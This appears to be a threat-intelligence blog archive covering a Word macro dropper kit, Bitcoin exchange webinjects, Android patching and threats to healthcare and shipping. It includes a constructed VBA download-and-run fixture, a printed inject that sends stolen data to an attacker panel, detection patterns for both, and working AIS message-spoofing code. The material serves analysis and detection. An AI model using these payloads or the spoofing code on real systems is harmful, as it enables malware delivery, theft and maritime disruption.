MacroExp – a Combined Social Engineering and Exploit Attack

Binding an executable, usually a malicious one, to an ordinary Word or Excel file without the user's knowledge has long been an aspiration of cyber criminals. With such an asset they can get the victim to install the malware unwittingly, without raising his suspicion or the AV alerts that running a bare executable file would. For this reason, requests for such services are frequently posted on underground forums, as cyber criminals look for easy ways to spread their malware. Occasionally this demand meets a supply, usually at a high price, given the opportunities it provides.

In this case, while monitoring Russian underground forums, we came across an advertisement for an exploit that targets Microsoft Office Word through its Visual Basic for Applications (VBA) macro feature. The tool, referred to as MacroExp v1.0.5 by the seller, first appeared for sale two days ago (on August 11) for $1,000. The price includes the exploit builder, as well as future updates and technical support. Note that, despite the seller's terminology, this is not an exploit of a software vulnerability: it relies on the victim enabling macros, as the seller himself admits below.

According to the description on the forum, the tool binds an executable file to a .doc file in a way that keeps the .exe invisible to the victim. It is said to be compatible with all versions of Word from 2000 to 2013, on both 32- and 64-bit Windows. The seller further claims that, since the executable is hidden, it is not detected by AV, IPS systems or firewalls. This claim deserves caution: once the macro fires, the executable still has to be written to disk and run, which is exactly where endpoint protection gets a second look at it.

The drawback of the method, which the seller himself acknowledges, is the macro-enabling security warning that Word displays before the executable can actually run. He suggests overcoming this obstacle with social engineering.

A week ago, Cisco reported that its researchers had detected this attack vector in the wild. It was used in spear-phishing attacks against industries such as banking, oil, television and jewelry. The attack started with a Word file written specifically for the recipient. When the document was opened, a macro-enabling alert popped up; once the victim enabled macros, the macro downloaded a malicious executable and launched it on the victim's computer.

It is difficult to say whether the same perpetrators are behind both attacks, or whether it is merely the same vector used in both cases. On the one hand, one of the C&C domains discovered by Cisco was registered seven years ago, which may indicate that the threat actor has been in operation since at least 2007. On the other hand, the seller has linked himself to the Cisco report, claiming that the described attack is his project. Moreover, he mentioned that more than 20 clients were already using the tool, and that this was not the first version since its release. The matter should become clearer as more cases are identified in the wild and more feedback from buyers appears on the forum.
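The Cisco chain above (document opened, macros enabled, executable downloaded and run) is also what a defender should look for in inbound Office files. The following Python script is an added example, not code from the seller's tool or from the Cisco report: it checks whether an OOXML document carries a VBA project, and scans VBA source for the auto-exec entry points and the download/execute capabilities that a macro dropper needs. The VBA module it scans is constructed for the demo (the URL is a placeholder and the module is a detection fixture, not working malware). Legacy .doc files are OLE containers rather than ZIP archives and would need an OLE parser such as the third-party olefile, which this example does not include.

```python
import io
import re
import zipfile

# Constructed sample: a VBA module of the download-and-execute pattern described
# above. The URL is a placeholder (example.invalid); this is a detection fixture.
SAMPLE_VBA = r'''
Private Declare Function URLDownloadToFile Lib "urlmon" Alias "URLDownloadToFileA" _
    (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, _
     ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long

Sub AutoOpen()
    Dim target As String
    target = Environ("TEMP") & "\update.exe"
    URLDownloadToFile 0, "http://example.invalid/payload.exe", target, 0, 0
    Shell target, vbHide
End Sub
'''

# Procedure names Office runs without any further click once macros are enabled.
AUTO_EXEC = re.compile(
    r"\b(Sub|Function)\s+(AutoOpen|AutoExec|AutoClose|Auto_Open|Document_Open|"
    r"Document_Close|Workbook_Open)\b", re.IGNORECASE)

# Capabilities a dropper needs: fetch a file, run it, stay out of sight.
SUSPICIOUS = {
    "download": re.compile(r"URLDownloadToFile|MSXML2\.XMLHTTP|WinHttp\.WinHttpRequest|ADODB\.Stream", re.I),
    "execute": re.compile(r"\bShell\b|WScript\.Shell|Win32_Process|ShellExecute", re.I),
    "hide": re.compile(r"\bvbHide\b|Application\.Visible\s*=\s*False", re.I),
    "obfuscate": re.compile(r"\bChr\s*\(|\bStrReverse\s*\(|\bXor\b", re.I),
}


def scan_vba(source):
    """Return the auto-exec entry points and capability tags found in VBA source."""
    auto = sorted({m.group(2) for m in AUTO_EXEC.finditer(source)}, key=str.lower)
    tags = sorted(tag for tag, rx in SUSPICIOUS.items() if rx.search(source))
    # Auto-exec plus download plus execute is the dropper signature; auto-exec
    # alone (a form initialiser, say) or a lone Shell call is only a warning.
    if auto and {"download", "execute"} <= set(tags):
        verdict = "dropper"
    elif auto or tags:
        verdict = "suspicious"
    else:
        verdict = "clean"
    return {"auto_exec": auto, "tags": tags, "verdict": verdict}


def has_vba_project(doc_bytes):
    """True if an OOXML file (docx/docm/xlsm) carries a VBA project part."""
    # Legacy .doc files are OLE2 containers, not ZIP; they are out of scope here.
    if not doc_bytes.startswith(b"PK"):
        return False
    with zipfile.ZipFile(io.BytesIO(doc_bytes)) as z:
        return any(name.lower().endswith("vbaproject.bin") for name in z.namelist())


def build_fake_ooxml(with_macro):
    """Constructed in-memory stand-in for a Word file, for the demo only."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr("word/document.xml", "<w:document/>")
        if with_macro:
            z.writestr("word/vbaProject.bin", b"\xd0\xcf\x11\xe0 fake project")
    return buf.getvalue()


if __name__ == "__main__":
    print(has_vba_project(build_fake_ooxml(True)), has_vba_project(build_fake_ooxml(False)))
    print(scan_vba(SAMPLE_VBA))
```

The verdict logic deliberately keys on the combination rather than on any single keyword: plenty of legitimate corporate macros call Shell or open an HTTP request, but a module that does both from an auto-exec procedure is the pattern described in the Cisco report and in the seller's advertisement.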

Screenshots of the exploit in action uploaded by the seller

Mind the Gap – Mind your Android

Android holds approximately 80% of the global mobile market today. Because of this popularity, Android phones are a more attractive target for hackers and cyber criminals than iOS phones.

Security researchers have discovered ways to take control of roughly 70% of Android devices via a Web page or an app, mostly devices running outdated versions. Although Google releases patches approximately every four months, most of these devices will likely remain vulnerable because they will never be updated.

Security consultant Graham Cluley made this point when he said: “The fundamental problem is that they [Google] don’t control the hardware and software. Even though all these devices are Android-operated, they run different tweaked versions with different UIs and add-ons.”

Whereas iOS runs only on Apple devices, which obtain updates directly and quickly, security updates for Android devices must pass through the device manufacturers and the mobile network operators, a detour that often takes a great deal of time.

The following chart describes the patching process for an Android device, from the discovery of a vulnerability (point A) to the fix that ultimately reaches the end-user device. The fix at point C is the generic software-repair step common to every software product; for most products, its release closes the vulnerability window that opened at point A.

Points D to G represent the part of the process that is specific to Android: whenever a patch becomes necessary, Google publishes the update to the open-source Android code base, the manufacturers build it into their own versions, the vendors release it, and finally the user installs the updated, customized version of the operating system.

Chart showing the creation of a patch for an Android device

It should be noted that the date of Google's patch release is not the date the update actually becomes available to users. Once Google releases an update, the manufacturer must adapt it to its own hardware and customized build. The update may never reach the user at all, for example if the vendor decides that distributing it is too expensive.

As a result of this vulnerability window, and of the gap between Google's release date and each manufacturer's, attackers can reverse engineer the vulnerability from the published patch (or from the patch of any manufacturer that shipped it earlier) and exploit it on devices that are still waiting for their update.

Clearly, it is not enough for Google to provide a secure Android platform; it is just as important that its patches reach their targets, Android users, in the shortest possible time, to minimize the attack window.

Bitcoin Exchange Script Injection Vulnerability

Written by Assaf Keren

It is no secret that Bitcoin is under a lot of scrutiny lately.

Bitcoin

From publicized breaches of Bitcoin trading sites to wild fluctuations in its value, the virtual currency that was considered a hot commodity until very recently is floundering. Perhaps the most alarming story demonstrating the instability of this currency is that of Mt. Gox, once the largest Bitcoin exchange in the world: the site first closed, then filed for bankruptcy, and its CEO's Twitter account was hacked. With all this controversy, the public is left wondering about the future of Bitcoin and the level of security the exchange sites provide. Naturally, hackers have also taken notice and have started looking for weaknesses in other Bitcoin exchange sites. Alongside the flurry of phishing emails, Bitcoin-mining bots and attempts to hack into Bitcoin exchange sites, there is a new trend: using a Trojan's ability to hijack HTTP sessions, or plain old XSS and CSRF attacks, attackers inject site-specific code into the user's browser session, scan for available funds in the user's account and steal them.

Recently, our analysts came upon four different injection codes, three for Bitcoin exchanges and one for a betting site. All of them are fashioned in the same way and are clearly written by the same author.

Below is an excerpt from one of the injections:

S:function(data){
    // Build a <script> element whose src points at the inject's admin panel.
    // {HERE_ADMIN_URL}, %BOTNET% and %BOTID% are placeholders the builder fills in.
    var s = document.createElement('script');
    s.type = 'text/javascript';
    s.async = false;
    // "data" is whatever the inject scraped from the page; Math.random() defeats
    // caching so that every call reaches the panel.
    s.src = "{HERE_ADMIN_URL}/?s=bitcoin&v=2&m=%BOTNET%&b=%BOTID%&t=" + data + "&rnd=" + Math.random();
    s.onerror = s.onload = s.onreadystatechange = function(){
        // Drop the handlers once the script has loaded (or failed); the
        // readyState checks cover old Internet Explorer.
        if(!this.loaded && (!this.readyState || this.readyState == 'loaded' || this.readyState == 'complete')){
            this.onerror = this.onload = this.onreadystatechange = null;
        }
    }
    // Insert into <head>. The document.appendChild fallback is the original
    // author's; it throws in browsers (a document already has a root element),
    // so the <head> branch is the one that matters.
    if(document.getElementsByTagName('head').length){ document.getElementsByTagName('head')[0].appendChild(s); }else{ document.appendChild(s); }
}

Further on in the code, the attackers change the site's CSS settings and replace the values of the send-to-address and send-value fields and of the send button. All in all, this is very simple and elegant code that makes use of the context in which it runs: it executes inside the victim's authenticated session, so from the exchange's side the fraudulent transfer looks like any other request made by the user.

This is not a new method of attack; it has been widely used in the past and will probably continue to be used. However, it demands a good understanding of how the exchanges work and how they build their web services, and it is highly version-specific: a change to the page layout breaks the inject. For the exchanges it is nonetheless bad news, since this targeting of their users is something they have limited capability to defend against (unlike attacks on their own servers).
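Because the inject runs inside the victim's browser, the exchange itself sees nothing unusual; the one thing that does leave a trace on the wire is the loader's call home to its panel. As an added example (not code from the inject or from any exchange), here is a Python scanner for proxy logs that flags the beacon's fixed parameter set (s, v, m, b, t, rnd) and, more generically, resources that an exchange page loads from hosts outside an allowlist. The log format, hosts, botnet and bot identifiers are all constructed for the demo.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed proxy log lines, one request per line:
#   timestamp client method url status referer
# The third line is what the loader above produces once the builder has
# filled in its placeholders (panel address, botnet and bot ids are made up).
SAMPLE_LOG = """\
2014-03-04T10:21:07Z 10.0.0.15 GET https://exchange.example/wallet/send 200 -
2014-03-04T10:21:08Z 10.0.0.15 GET https://exchange.example/static/app.js 200 https://exchange.example/wallet/send
2014-03-04T10:21:08Z 10.0.0.15 GET http://198.51.100.23/?s=bitcoin&v=2&m=btc01&b=7F3A9C&t=balance%3D1.52&rnd=0.4231776 200 https://exchange.example/wallet/send
2014-03-04T10:22:41Z 10.0.0.22 GET https://cdn.example/jquery.min.js 200 https://exchange.example/
2014-03-04T10:23:05Z 10.0.0.22 GET https://stats.example/collect.js 200 https://exchange.example/wallet/send
""".strip().splitlines()

# Hosts an exchange page is expected to load resources from (assumed allowlist).
TRUSTED_HOSTS = {"exchange.example", "cdn.example"}

# Query keys the loader shown above always sends to its panel.
BEACON_KEYS = {"s", "v", "m", "b", "t", "rnd"}


def parse_line(line):
    ts, client, method, url, status, referer = line.split(" ", 5)
    return {"ts": ts, "client": client, "method": method, "url": url,
            "status": int(status), "referer": referer}


def is_beacon(url):
    """True if the URL carries the loader's fixed parameter set."""
    q = parse_qs(urlsplit(url).query)
    if not BEACON_KEYS <= q.keys():
        return False
    # Math.random() renders as 0.<digits>; anything else is some other client.
    return re.fullmatch(r"0\.\d+", q["rnd"][0]) is not None


def is_untrusted_fetch(entry, trusted):
    """A request referred by a trusted page but served from an unknown host."""
    ref_host = urlsplit(entry["referer"]).hostname if entry["referer"] != "-" else None
    return ref_host in trusted and urlsplit(entry["url"]).hostname not in trusted


def scan_proxy_log(lines, trusted=TRUSTED_HOSTS):
    """Return findings, most specific signature first for each line."""
    findings = []
    for line in lines:
        e = parse_line(line)
        host = urlsplit(e["url"]).hostname
        if is_beacon(e["url"]):
            q = parse_qs(urlsplit(e["url"]).query)
            findings.append({"client": e["client"], "host": host, "severity": "high",
                             "reason": "webinject beacon",
                             "botnet": q["m"][0], "botid": q["b"][0], "data": q["t"][0]})
        elif is_untrusted_fetch(e, trusted):
            findings.append({"client": e["client"], "host": host, "severity": "medium",
                             "reason": "untrusted host loaded from exchange page"})
    return findings


if __name__ == "__main__":
    for finding in scan_proxy_log(SAMPLE_LOG):
        print(finding)
```

The beacon signature is brittle by design (a new inject version changes the parameter names), which is why the second, allowlist-based rule is there: a third-party host appearing in the referer chain of the send-funds page is worth a look regardless of what the query string says.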

The process that the exchanges are going through is very similar to what banks and e-commerce services went through when they started providing Internet services. The problem is that banks have the ability, staff and resources (and insurance) to limit transactions and work with customers on fraud cases, while Bitcoin exchanges do not have that kind of capability yet. Even if a specific attack is stopped, we will probably see more and more attacks on Bitcoin (and other currencies) users. This is just one more step in the evolution of crypto-currency to a more mature state.

Cyber Threats to the Healthcare Industry

Written by Gal Landesman

Introduction

The healthcare industry is advancing rapidly, linking systems and medical devices to the Internet, adopting electronic health records and implementing regulatory reforms. Tremendous technological advances in the medical industry bring with them a greater reliance on software-controlled devices and wireless technologies. These technologies are used in every visit to the doctor and in hospital wards, and many of them connect, or are capable of connecting, to the Internet. Alongside the opportunities this presents, the industry is also a major target for cyberattack, mostly for financial motives. In the following post, we present some of the cyber threats currently faced by the healthcare industry.

In today’s environment, organizations are required to take responsibility for securing their networks and computers. Alarming vulnerabilities in medical devices have caused the FDA to issue guidelines for cyber security of the medical device industry. The U.S. Health Information Technology for Economic and Clinical Health Act, for example, permits the fining of hospitals and other organizations up to $1.5 million a year for serious security incidents. Unfortunately, the industry is falling short of complying with said security standards. Last year, for example, the U.S. Department of Health and Human Services’ Office for Civil Rights (OCR) performed a random audit of 20 healthcare organizations, 19 of which failed.

(Note –  this blog post is an excerpt from our report: ”Cyber Threats to the Healthcare Industry”. If you are interested in receiving the full report, please write to: info@sensecy.com).

Threats to the Healthcare Industry

According to security experts, cyber criminals are shifting their focus from the financial industry to the healthcare industry, today an easier and more profitable target. Healthcare records contain valuable information for cyber criminals, such as social security numbers and personal information. Credit card records sell for an average of $2, while medical records can fetch about $20 on the black market. According to the Experian 2014 Data Breach Industry Forecast, the healthcare industry is likely to make the most breach headlines in 2014, despite the fact that 2013 was a year of mega-breaches in the healthcare industry.

Hackers’ ransom note, after breaking into a Virginia government website

Identity and Information Theft

Medical identity theft occurs when someone uses an individual’s name and personal identity to fraudulently receive medical services, prescription drugs and goods, or attempts to commit fraudulent billing. Information theft can include the theft of personal information for malicious use, such as selling it on the DarkNet. According to a Ponemon Institute 2013 survey, medical identity theft claimed more than 1.84 million U.S. victims in 2013. Medical identity theft is on the rise in the U.S., where the number of victims in 2013 increased by 19%.

Medical Device Breaching

Over the last 15 years, a growing number of medical devices have become interconnected through hospital networks, the Internet, smartphones and other devices, increasing their exposure. This has not escaped the attention of the FDA, which recently issued new guidelines to biomedical engineers, healthcare IT and procurement staff, medical device user facilities, hospitals and medical device manufacturers.

The new FDA guidelines came in response to the 2012 findings of a governmental panel that revealed that computerized hospital equipment is increasingly vulnerable to malware infection that can potentially render these devices temporarily inoperable. Many of the devices run on Windows variants. They are interconnected through internal networks to the Internet and are also exposed to laptops in the hospitals, making them vulnerable to malware.

An example of the consequences was given by the medical-device panel of the NIST Information Security & Privacy Advisory Board, which described fetal monitors in intensive-care wards that were slowed down by malware infection. The problem can affect a wide range of devices, such as compounders and diagnostic equipment.

A report issued by the Government Accountability Office (GAO) warned mostly about vulnerabilities found in wireless implanted defibrillators and insulin pumps, but thousands of other network-connected life-saving devices are also vulnerable. Malware in medical devices is probably much more prevalent than we know, since most of it is not reported to the regulators and there are no records. The OS updating process for medical devices is an onerous regulatory process.

Cyber threats to medical devices (from the GAO report)

Conclusion

We believe that the healthcare industry is facing major threats from cyberspace. These threats encompass large areas of the industry and may become a greater burden for it, compromising patient safety, and causing financial and commercial damage to the associated bodies.

SenseCy is coming to town! Come meet us at the RSA USA 2014 conference, February 24-28, in San Francisco.

Hacking as an Artistic Expression

Hackers are creative people. Everybody knows that. They have to be technically creative in order to outsmart security mechanisms, perform their antics and get away without being caught (sometimes).
But artistic creativity? Not the first thing we associate with hacking. However, after witnessing their creative works of art, we felt compelled to share these with you.
So you are welcome to enjoy the works of the “Russian classical painters”, the “surrealist hacktivists designers” and the “Iranian masters”:

A Russian hacking forum
Portal of Russian hackers
Another Russian hacking forum
A carding shop
#OpUSA (May 7, 2013)
#OpPetrol (June 20, 2013)
#OpEgypt
Iranian Cyber Army (ICA)
Ashiyane Digital Security Team (ADST)

Cyber Threats to the Shipping Industry

Introduction

Several cyber threats to the shipping industry have been reported of late, illustrating the vulnerability of this industry, a fact that cyber criminals, terrorists and even hacktivists are already exploiting.

(Please note –  this blog post is an excerpt from our report: “Cyber Threats to the Shipping Industry”. If you are interested in receiving the full report please write to: info@sensecy.com).

Vulnerabilities of Automatic Identification System Exposed

Researchers at the security firm Trend Micro reported that they had identified serious security flaws in the Automatic Identification System (AIS). AIS is a global system that identifies and tracks vessels in real time; it periodically broadcasts, among other information, a vessel's identity, position, speed and heading. The International Maritime Organization (IMO) mandates it on all passenger vessels and on commercial vessels of 300 gross tonnage and above. In their experiments, the researchers managed to inject and alter AIS data in real time.

The researchers were able to spoof the route of a vessel to spell “PWNED”, meaning “hacked”

The attack was carried out in two phases. First, they identified the main AIS Internet providers that collect and distribute AIS information, and exploited the fact that these services accept unauthenticated data, which allowed them to:

  • Modify all of a ship's details, such as position, course, cargo, flag, speed, name, MMSI (Maritime Mobile Service Identity) and status.
  • Create fake vessels with realistic details, e.g. an Iranian vessel with nuclear cargo appearing off the coast of the U.S.

In the second phase, they exploited weaknesses in the AIS radio protocol that every vessel's transceiver must implement. Using a US$200 transmitter on the marine VHF AIS channels (161.975 MHz and 162.025 MHz), they were able to:

  • Permanently disable the AIS system on a vessel, forcing the ship to stop transmitting its position and to stop receiving AIS notifications from all vessels in the vicinity.
  • Issue a fake CPA (Closest Point of Approach) alert and trigger a collision warning.
  • Fake a “man-in-the-water” distress beacon at any location, which also triggers alarms on all nearby vessels.
  • Send false weather information to a vessel, e.g. an approaching storm, so that it changes course.
  • Cause all ships to transmit AIS traffic much more frequently than normal, flooding the channel and blocking communications from maritime authorities and other vessels in range.

These flaws allow hostile entities to alter the real-time picture of vessels at sea, with the potential to cause economic damage, in addition to serious safety risks to vessels and the sabotage of maritime enforcement agencies (police, coastguard etc.). The gap is particularly worrisome because exploiting it requires neither expensive equipment nor impressive hacking skills. The threat is that terrorist organizations could exploit it, with serious physical consequences and even the paralysis of maritime traffic in a particular area.
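The reason the second phase is so cheap is visible in the protocol itself. The Python below is an added example, not part of the Trend Micro research: it encodes a Class A position report (AIS message type 1) into an NMEA !AIVDM sentence using the public ITU-R M.1371 bit layout, and decodes it again. Every field, including the MMSI, is plain data; the only checks are a CRC at the radio layer and an XOR checksum on the NMEA sentence, neither of which tells a receiver who transmitted the bits. The MMSI and coordinates are constructed sample values.

```python
def _bits(value, width):
    """Fixed-width big-endian bit string; negatives in two's complement."""
    if value < 0:
        value += 1 << width
    if not 0 <= value < (1 << width):
        raise ValueError("value does not fit in %d bits" % width)
    return format(value, "0%db" % width)


def _signed(bits):
    v = int(bits, 2)
    return v - (1 << len(bits)) if bits[0] == "1" else v


def armor(bitstr):
    """AIS 6-bit ASCII armoring; returns (payload, fill_bits)."""
    fill = (-len(bitstr)) % 6
    bitstr += "0" * fill
    chars = []
    for i in range(0, len(bitstr), 6):
        v = int(bitstr[i:i + 6], 2)
        chars.append(chr(v + 48 if v < 40 else v + 56))
    return "".join(chars), fill


def dearmor(payload):
    out = []
    for ch in payload:
        v = ord(ch) - 48
        if v > 40:
            v -= 8
        out.append(format(v, "06b"))
    return "".join(out)


def nmea_checksum(body):
    """XOR of every byte between '!' and '*', as two upper-case hex digits."""
    c = 0
    for ch in body:
        c ^= ord(ch)
    return "%02X" % c


def encode_position_report(mmsi, lat, lon, sog_knots=0.0, cog_deg=0.0, heading=511, channel="A"):
    """Build a type 1 position report; positions are in 1/10000 arc-minute units."""
    fields = [
        _bits(1, 6),                       # message type 1
        _bits(0, 2),                       # repeat indicator
        _bits(mmsi, 30),                   # MMSI: whatever the sender claims
        _bits(0, 4),                       # nav status: under way using engine
        _bits(-128, 8),                    # rate of turn: not available
        _bits(round(sog_knots * 10), 10),  # speed over ground, 0.1 kn
        _bits(0, 1),                       # position accuracy
        _bits(round(lon * 600000), 28),    # longitude
        _bits(round(lat * 600000), 27),    # latitude
        _bits(round(cog_deg * 10), 12),    # course over ground, 0.1 deg
        _bits(heading, 9),                 # true heading, 511 = not available
        _bits(60, 6),                      # UTC second, 60 = not available
        _bits(0, 2), _bits(0, 3),          # manoeuvre indicator, spare
        _bits(0, 1),                       # RAIM flag
        _bits(0, 19),                      # radio status
    ]
    payload, fill = armor("".join(fields))
    body = "AIVDM,1,1,,%s,%s,%d" % (channel, payload, fill)
    return "!%s*%s" % (body, nmea_checksum(body))


def verify_checksum(sentence):
    body, sep, given = sentence[1:].partition("*")
    return sep == "*" and nmea_checksum(body) == given.strip().upper()


def decode_position_report(sentence):
    """Decode a single-fragment type 1/2/3 sentence into a dict of fields."""
    if not sentence.startswith("!AIVDM") or not verify_checksum(sentence):
        raise ValueError("not a well-formed AIVDM sentence")
    parts = sentence[1:].partition("*")[0].split(",")
    if parts[1] != "1":
        raise ValueError("multi-fragment messages are not handled here")
    bits = dearmor(parts[5])
    msg_type = int(bits[0:6], 2)
    if msg_type not in (1, 2, 3):
        raise ValueError("not a position report")
    return {
        "type": msg_type,
        "mmsi": int(bits[8:38], 2),
        "nav_status": int(bits[38:42], 2),
        "sog_knots": int(bits[50:60], 2) / 10,
        "lon": _signed(bits[61:89]) / 600000,
        "lat": _signed(bits[89:116]) / 600000,
        "cog_deg": int(bits[116:128], 2) / 10,
        "heading": int(bits[128:137], 2),
    }


if __name__ == "__main__":
    # Constructed sample: a ship reported off Manhattan under an arbitrary MMSI.
    s = encode_position_report(338123456, 40.6892, -74.0445, 12.3, 215.5, 215)
    print(s)
    print(decode_position_report(s))
```

Run it and the sentence that comes out is indistinguishable, to any AIS receiver or aggregation website, from one sent by a real transponder. The practical defences therefore sit outside the protocol: cross-checking reported positions against radar or satellite AIS, flagging vessels that appear out of nowhere or move implausibly fast, and treating Internet-sourced AIS feeds as untrusted input.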

Cyber Attack Breaches Port Security; Container Hijacked

On October 16, 2013, Europol announced it had exposed a network of drug traffickers who recruited hackers to breach IT systems in the port of Antwerp, Belgium. The purpose of the breach was to allow hackers to access secure data giving them the location and security details of containers (that contained smuggled drugs worth billions of dollars), allowing the traffickers to send in truck drivers to steal the cargo before the legitimate owner arrived.

The operation (which took place over a two-year period) went undetected by the port authorities and shipping companies involved. It was apparently uncovered with the recent arrests of members of the “Silk Road” website who sold drugs on the DarkNet in the U.S. The investigation was carried out by a team from Europol that in a related series of raids managed to confiscate containers holding cocaine and heroin worth hundreds of millions of dollars.

KVM devices used in the Antwerp attack

The breach of the port and shipping companies’ computer systems began with a spear-phishing attack, i.e. sending innocent-looking emails with malicious contents to employees of transportation companies working in the port of Antwerp. When the ring members saw that this channel had become blocked by enhanced IT security, they physically broke into the companies’ offices and installed KVM (keyboard, video and mouse) switches to enable remote access to the computer systems. The KVM switches were assembled and prepared in a professional manner and included miniature PCs concealed inside electrical power strips, external hard drives, as well as keyloggers disguised as USB keyboard port converters. Although some of this equipment was designed simply to steal login credentials, the hackers appear to have used wireless cards to study and possibly control the logistics systems in real time. The group then sent its drivers to the port and provided them with all the necessary certificates and release codes to retrieve the containers.

Weaponization of Cyber Coins – The Next Attack Vector?

Written by Jeremy Jacobson

It’s getting kind of hard to ignore all the buzz surrounding bitcoins these days. The cryptocurrency, which allows users to conduct peer-to-peer (P2P) monetary transactions with a significant degree of anonymity, has exploded in value, currently hovering around $900 per bitcoin, leading many to speculate about the long-term viability and implications of cryptocurrencies in general. However, lost amid the debate is serious discussion of the next logical step in the evolution of P2P cryptocurrencies: the eventual weaponization of the cyber-coin.

Bitcoin itself has already become a favorite among cyber-criminals. Whether laundering money, selling drugs (remember Silk Road?) or procuring the services of a hit man, the ability to carry out monetary transactions anonymously over the Internet has made online crime both easy and relatively risk free. This, and the fact that at least 2,600 stores accept bitcoins worldwide (as does the Sacramento Kings basketball team), according to Robert J. Samuelson of the Washington Post, has led to the massive inflation in Bitcoin's value and has attracted investors looking for an easy payday.

Bitcoin

Like any good idea, Bitcoin has also attracted numerous imitations, resulting in cryptocurrencies ranging from the very serious to the bizarre. For example, Litecoin is a cryptocurrency almost identical to Bitcoin that purports to incorporate three main improvements over the Bitcoin software. In contrast, Dogecoin plays off the popularity of the “Doge” meme, which was rated 2013's meme of the year, while the Coinye cryptocurrency uses the likeness of rapper and pop-culture icon Kanye West to market its brand (West's lawyers are still attempting to shut the coin down). According to Charlotte Lytton of the Daily Beast, there are at least 71 types of cryptocurrency out there, some of which are suspiciously reminiscent of the old Wall Street pump-and-dump scheme.

Enter Allahcoin. This P2P Islamic currency offers similar software to Bitcoin, but with a couple of modifications. One new feature is that for every Allahcoin mined, 10% will be donated to the Muslim Brotherhood foundation. This coin not only offers a brand new cryptocurrency, but an easy and anonymous way for users to donate to their favorite Islamist organization!

The Muslim Brotherhood does not fit the traditional definition of a terrorist organization. However, it may not be long before jihadist groups with ties to the Brotherhood, or like-minded groups, catch on to the advantages of the nascent cryptocurrency technology. As with criminals, fundraising and money laundering are the most obvious benefits for such groups, but it is possible that terrorists could one day weaponize a cryptocurrency of their own.

How would a weaponized cryptocurrency work? It is hard to say exactly, but current abuses of alternative cryptocurrencies may hint at an answer. For instance, some currencies are designed to look suspiciously like pump-and-dump schemes. An attacker could distribute a virus-laced currency (in practice, a wallet client carrying malware) in the same way during the scheme's pump phase. After spreading the currency widely enough, the attacker could activate a trigger, spreading the virus through users' virtual wallets. Depending on the type of attack, the virus could expose users' identities, neutralize their virtual wallets, rip off their accounts, or steal information from their networks. In a worst-case scenario, terrorists could target tech contractors and infect their computers and online accounts via the currency, increasing the chance of the virus spreading to their clients' networks (similar to how the Stuxnet worm may have reached an Iranian nuclear facility, according to Ralph Langner writing in Foreign Policy).

Just as P2P file sharing through software such as Limewire and eMule eventually became natural habitats for the spread of viruses, it is likely that cryptocurrencies will one day be weaponized. The question is not if, but when the first attacks will occur, who will be behind them, and how much damage will they cause.

The “Total Sting” – 419 Scam Evolved

Have you ever received a suspicious looking email, urging you to send money or provide your banking account details to someone you don’t know? Sure you have.

This is one of the Internet's most common scams, and it has many names: “phishing”, “advance-fee fraud”, “Nigerian sting” or the 419 scam (after the article of the Nigerian Criminal Code dealing with fraud).

The logic is simple – send numerous phishing emails, and you can expect that at least some people will be gullible enough to provide you with money or banking details. When you send millions of emails even a meagre return percentage is enough to generate hefty sums. But there’s a catch – most people are by now aware of this and are reluctant to reply or even open emails which do not appear to have been sent from a known acquaintance or organization. So 419 scammers have to evolve in order to survive. One way of doing so is utilizing social networks, and especially LinkedIn, since people tend to see it as a professional network and trust information and requests to connect which originate there.

Enter the “Total Sting”.

An open position as Senior Project Manager at Total Oil as published on LinkedIn

The story is simple, yet entails great sophistication and creativity. As a LinkedIn member you one day notice a lucrative job opening: Total, one of the leading oil and gas companies, is opening new offices in your country and recruiting a senior project manager.

You submit your application via LinkedIn, and a few days later you receive a formal-looking email from Gérard Lamarche of the Total HR Dept. (even the email address, apply@totalconsult.int.tf, looks legitimate at a glance, although it is not on Total's own domain). Out of curiosity you check who this gentleman is and find that he is a director at Total (http://total.com/en/media/news/press-releases/20120116-appointment-gerard-lamarche-director-total-sareplacing-thierry-rudder).

The Invitation Letter (allegedly) received from Total Oil

Now comes the fun part. The email includes three attachments. Since you know this is a reply to a submission you sent, you don't hesitate to open the PDF files. There is a very attractive job description, an official-looking invitation to an interview in London and another letter describing the technicalities of the interview. You are cordially invited to come to London and interview for the lucrative job at Total's recruitment offices: Human Resources Department, TOTAL UK Limited, 40 Clarendon Road, Watford, Hertfordshire WD17 1TQ.

Out of curiosity you Google the address and find that this is indeed the official address of Total in the UK. There is only one catch: you need to make the travel arrangements through a specific agency (but don't worry, you will be reimbursed upon arrival). The contact person's name is Dr. Kenneth Cole (hmmm) and the travel agency is Belair Travel and Tours (located at Air Malta House, 314-316 Upper Richmond Rd, London SW1). Now things are looking a little more suspicious.

A letter requesting to arrange travel through a designated travel agency

You decide to look into this more carefully. You phone the number, but there is no answer. You check the website of the real company, located in East Kensington, London, and find that it uses completely different phone numbers (http://www.belleair.co.uk/contactbelleair).

You search a little more on the web and immediately see that this is indeed a scam (http://www.419baiter.com/_scam_emails/01-08/419_emails_total-oil-company-job-scam.html).

So you were just one of many lured into a simple phishing scam? Not quite.

This is an evolution of the classic 419, and this is why: the perpetrators of this specific scam have done almost everything possible to overcome the identifiable pitfalls of Phishing emails.

This scam is reactive, it is targeted at a specific audience, it looks official and it does not ask directly for money or details in advance. Someone had to create a fake company profile on LinkedIn, post an authentic-looking position, receive and read emails, fabricate authentic-looking documents (complete with logo and the name of an actual executive), enter the job seeker's name into the documents' titles and send it all back. And since this is a reply to an email/job submission, the recipient is much more likely to open it and perhaps respond. The logical next step for this scam is for the scammers to create a fake website (which will appear completely real) and let you submit your details there, making the fraud almost perfect.

I would like to thank Itay and Tanya, who shared this with me and assisted me in describing it in detail.

P.S. We checked, and the PDF files were not weaponized (i.e. carrying malware). Had they been, this would have been a spear-phishing campaign, and a darn good one too.

P.S. 2: If you ever notice this type of scam, please notify the good people at LinkedIn at phishing@linkedin.com (we have).

Cyber Intelligence Yearly Report

Executive Summary

The SenseCy Cyber Intelligence team, along with our partners ClearSky and Aman Computers, has been providing intelligence monitoring services to leading financial institutions in Israel for over a year. Our unique methodology of using “Virtual Entities” to infiltrate cyber-attack groups and the underground has proven successful in alerting on imminent cyber threats, as well as in detecting new malware types and monitoring broader cyber trends.

The following is an extract of an annual report sent to our customers. To receive a copy, please send a request to: info@sensecy.com

Main Findings

